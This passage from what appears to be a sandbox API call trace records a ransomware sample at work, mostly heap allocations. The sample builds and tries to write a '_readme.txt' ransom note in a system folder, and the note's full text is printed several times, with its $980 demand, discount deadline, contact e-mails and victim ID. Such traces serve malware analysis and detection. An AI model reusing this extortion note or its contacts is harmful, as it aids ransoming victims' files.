hHeap=0x630000) returned 1 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.453] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0227.453] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.453] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.453] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.453] PathFindFileNameW (pszPath="") returned="" [0227.453] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.453] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.453] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.454] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.454] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.454] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.454] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.454] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0227.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.454] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.454] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0227.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.454] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.454] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.454] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.455] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.455] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.455] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.455] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.455] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.455] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.455] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.455] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.455] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.456] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 